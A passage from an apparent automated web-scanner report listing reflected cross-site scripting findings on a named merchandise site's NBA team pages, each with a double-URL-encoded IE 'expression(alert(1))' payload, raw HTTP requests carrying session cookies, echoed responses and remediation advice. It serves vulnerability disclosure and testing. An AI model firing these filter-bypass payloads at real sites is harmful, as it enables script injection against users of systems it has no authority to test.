This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/denver_nuggets?fecb4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279aff6941ac8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:29 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:31 GMT
NS_RTIMER_COMPOSITE: -708611836:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2vhBMyTHKnjv2BnWlgBpvnxnZkQcsJzWpkp3mb90z9S7nTT7tqSFYLTjhVbWNjQnGc3Ttv2GGqv4TptGCpTLhTvblnJR3qwnswcn2WmZ2F2QL74nkvGl6BGnW0wqpypR!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:39 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=930
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 78452


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Denver Nuggets</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144112&fecb4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279aff6941ac8=1&fecb4'style='x:expression(alert(1))'9aff6941ac8=1&fecb4%27style%3d%27x%3aexpression%28alert%281%29%29%279aff6941ac8=1&fromsla=T'>
...[SNIP]...

1.24. http://www.turnerlicensing.com/NBA/detroit_pistons [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/detroit_pistons

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d475%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6c8dbceaec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d475'style='x:expression(alert(1))'d6c8dbceaec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/detroit_pistons?4d475%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6c8dbceaec=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:37 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:40 GMT
NS_RTIMER_COMPOSITE: -1254873080:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=TWhLMyTPLczTLhycbZWQV6frQs1DWwTXyJ2xv2234JXQMDWDdhx7XyrDhSZbL1JpmZkCZXMdDnpzhzQgyy1vclLrd8yGLV1gV9QYjVjL4858LGSXZ4TG6BLQJ25TnFK1!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:48 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=970
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 83955


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Detroit Pistons</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144114&4d475%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6c8dbceaec=1&4d475'style='x:expression(alert(1))'d6c8dbceaec=1&4d475%27style%3d%27x%3aexpression%28alert%281%29%29%27d6c8dbceaec=1&fromsla=T'>
...[SNIP]...

1.25. http://www.turnerlicensing.com/NBA/detroit_pistons/8170354 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/detroit_pistons/8170354

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9d28%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d60c610a11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9d28'style='x:expression(alert(1))'d60c610a11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/detroit_pistons/8170354?d9d28%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d60c610a11=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:52:09 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:52:10 GMT
NS_RTIMER_COMPOSITE: -592124516:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=vTLfMyYZyDNRBkBNjpn9QtNhN6GzcQvJLx82VQ7nPRTsGjMCqCBQkG1Q6Wv2ZvyjddsQzQJdGhgLj3dDCmTfzGXyLVNhS2sJ2Z0LXSTdQppnd5xTvZG2qh1Q4DsbJ9Ls!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:52:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=890
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 70961


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Detroit Pistons</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144114&it=A&id=1683&d9d28%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d60c610a11=1&d9d28'style='x:expression(alert(1))'d60c610a11=1&d9d28%27style%3d%27x%3aexpression%28alert%281%29%29%27d60c610a11=1&fromsla=T'>
...[SNIP]...

1.26. http://www.turnerlicensing.com/NBA/golden_state_warriors [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/golden_state_warriors

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da011%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb8effa7465 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da011'style='x:expression(alert(1))'bb8effa7465 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/golden_state_warriors?da011%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb8effa7465=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:19 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:24 GMT
NS_RTIMER_COMPOSITE: -367077977:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JL52MyTflyzvkt1FZDJ0pQZ1hnh2NTjzHsPfQ1nnH102Y97ZrJzwn3gtMXhDxZXqdgvyJ1ZxrbzvR8zT8sZLyLSXX6Jxv2s9l7YXrxZR9Qcy9gJhp2J7wdLB21Xvd4lq!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:29 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 56669


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Golden State Warriors</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144116&da011%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb8effa7465=1&da011'style='x:expression(alert(1))'bb8effa7465=1&da011%27style%3d%27x%3aexpression%28alert%281%29%29%27bb8effa7465=1&fromsla=T'>
...[SNIP]...

1.27. http://www.turnerlicensing.com/NBA/houston_rockets [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/houston_rockets

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f230e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710376efa672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f230e'style='x:expression(alert(1))'10376efa672 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/houston_rockets?f230e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710376efa672=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:38 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:41 GMT
NS_RTIMER_COMPOSITE: -702717150:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=dsjrMyTQDHnvP018QjNQ3HRg5W0yTbH61qC6wcXYf3KRQ1PFzH3LvLT5R0GtyG9LtSNqQvMbJtvQ5ScgVXR5BzncQXQ1n3cgLl2QW2Y6cXPc8CWvd7HyrLndC0QjhKs8!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:49 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=861
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 78489


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Houston Rockets</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144117&f230e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710376efa672=1&f230e%27style%3d%27x%3aexpression%28alert%281%29%29%2710376efa672=1&f230e'style='x:expression(alert(1))'10376efa672=1&fromsla=T'>
...[SNIP]...

1.28. http://www.turnerlicensing.com/NBA/indiana_pacers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/indiana_pacers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62eed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527169b01b72cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62eed'style='x:expression(alert(1))'169b01b72cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/indiana_pacers?62eed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527169b01b72cb=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:44 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:50 GMT
NS_RTIMER_COMPOSITE: -714496707:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=DLyfMyTYZBYgl4cgZkLTKWQqX4h7VD4m5Sv32M2c5Wfv1BrQwW9lnM3mhNFnYrh2wFbfG8TlLrf4c8LYGGqNWBflYQMl3vThNB2zXpmHf31nMsd97TVKgZSk379vm9rl!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=929
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 94903


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Indiana Pacers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144119&62eed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527169b01b72cb=1&62eed'style='x:expression(alert(1))'169b01b72cb=1&62eed%27style%3d%27x%3aexpression%28alert%281%29%29%27169b01b72cb=1&fromsla=T'>
...[SNIP]...

1.29. http://www.turnerlicensing.com/NBA/los_angeles_clippers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/los_angeles_clippers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf1d3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278bebc190ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf1d3'style='x:expression(alert(1))'8bebc190ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/los_angeles_clippers?bf1d3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278bebc190ba=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:30 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:33 GMT
NS_RTIMER_COMPOSITE: -1152512295:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=bmn2MyTJJq2gVkPVywPQdTJ9nfLKyPvGL1hvqTp18mTryYWrkpG5t4MKL4Bvllj7dhlQlGws14yGhvpQDftq7P45MglWnPq5sN1bVQz8l856P1L2Lr3cgTtyQT3nvXTW!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=888
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 51156


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Los Angeles Clippers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144121&bf1d3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278bebc190ba=1&bf1d3'style='x:expression(alert(1))'8bebc190ba=1&bf1d3%27style%3d%27x%3aexpression%28alert%281%29%29%278bebc190ba=1&fromsla=T'>
...[SNIP]...

1.30. http://www.turnerlicensing.com/NBA/los_angeles_lakers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/los_angeles_lakers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43257%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277a0d3f891bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43257'style='x:expression(alert(1))'7a0d3f891bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/los_angeles_lakers?43257%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277a0d3f891bf=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:52 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:56 GMT
NS_RTIMER_COMPOSITE: 1222821367:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=QzYyMyTfwjX1M1C9mCsVhHC3DhmcKTD0WFFwPbVpNJPpD4mxYp2fD7sfY6c0hnDGJNnJLLBC9n1yrZCvYnFLQ2h82zBbQ3nzMyvDg61XTp62hcsZHrrTC3Zmp5n9tTFb!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:07 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=794
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 101272


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Los Angeles Lakers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144124&43257%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277a0d3f891bf=1&43257'style='x:expression(alert(1))'7a0d3f891bf=1&43257%27style%3d%27x%3aexpression%28alert%281%29%29%277a0d3f891bf=1&fromsla=T'>
...[SNIP]...

1.31. http://www.turnerlicensing.com/NBA/los_angeles_lakers/8010793 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/los_angeles_lakers/8010793

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66095%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252700567ee7d15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66095'style='x:expression(alert(1))'00567ee7d15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/los_angeles_lakers/8010793?66095%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252700567ee7d15=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:52:13 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:52:14 GMT
NS_RTIMER_COMPOSITE: 335161715:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
